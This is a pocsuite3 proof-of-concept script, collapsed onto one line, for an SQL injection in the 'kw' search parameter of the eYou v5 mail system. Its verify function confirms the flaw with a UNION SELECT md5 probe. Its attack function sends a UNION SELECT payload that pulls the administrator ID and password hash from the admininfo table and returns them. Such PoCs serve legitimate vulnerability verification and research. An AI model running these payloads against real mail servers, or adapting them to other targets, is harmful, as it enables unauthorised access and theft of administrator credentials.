eYou v5 /em_controller_action_help.class.php SQL注入漏洞

""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import re from urllib.parse import quote class DemoPOC(POCBase): vulID = '1250' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-04-22' createDate = '2014-04-29' updateDate = '2014-04-29' references = ['http://wooyun.org/bugs/wooyun-2014-058014'] name = 'eYou v5 /em_controller_action_help.class.php SQL注入漏洞 POC' appPowerLink = 'http://www.eyou.net' appName = 'eYou' appVersion = 'V5.0.0-V5.0.4#' vulType = 'SQL Injection' desc = ''' eyou邮件系统V5存在一处web/php/user/em_controller_action_help.class.php 页面，该页面“kw”参数未进行过滤，存在SQL注入漏洞。 ''' samples = [] install_requires = [''] def _verify(self): result = {} vul_url = '%s/user/?q=help&type=search&page=1&kw=' % self.url payload = '") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,(SELECT CONCAT(0x2d2d2d,IFNULL' \ '(CAST(admin_id AS CHAR),0x20),0x2d2d2d,IFNULL(CAST(admin_pass AS CHAR),0x20' \ '),0x2d2d2d) FROM filter.admininfo LIMIT 0,1),NULL#' payload_v = '") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5(360213360213),NULL#' match_data = re.compile('did=---(.*)---([\w\d]{32,32})---') try: response = requests.get(vul_url + quote(payload_v)).text except Exception as e: return self.parse_output(result) if '5d975967029ada386ba2980a04b7720e' in response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} vul_url = '%s/user/?q=help&type=search&page=1&kw=' % self.url payload = '") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,(SELECT CONCAT(0x2d2d2d,IFNULL' \ '(CAST(admin_id AS CHAR),0x20),0x2d2d2d,IFNULL(CAST(admin_pass AS CHAR),0x20' \ '),0x2d2d2d) FROM filter.admininfo LIMIT 0,1),NULL#' payload_v = '") UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,md5(360213360213),NULL#' match_data = re.compile('did=---(.*)---([\w\d]{32,32})---') try: response = requests.get(vul_url + quote(payload)).text except: return # response = urllib2.urlopen(vul_url + urllib2.quote(payload)).read() data = match_data.findall(response) if data: # {name: 'AdminInfo'， value: '管理员信息'}, # {name: 'Uid'， value: '管理员ID'}, # {name: 'Username'， value: '管理员用户名'}, # {name: 'Password'， value: '管理员密码'}, result["AdminInfo"] = {} result['AdminInfo']["Username"] = data[0][0] result['AdminInfo']['Password'] = data[0][1] register_poc(DemoPOC)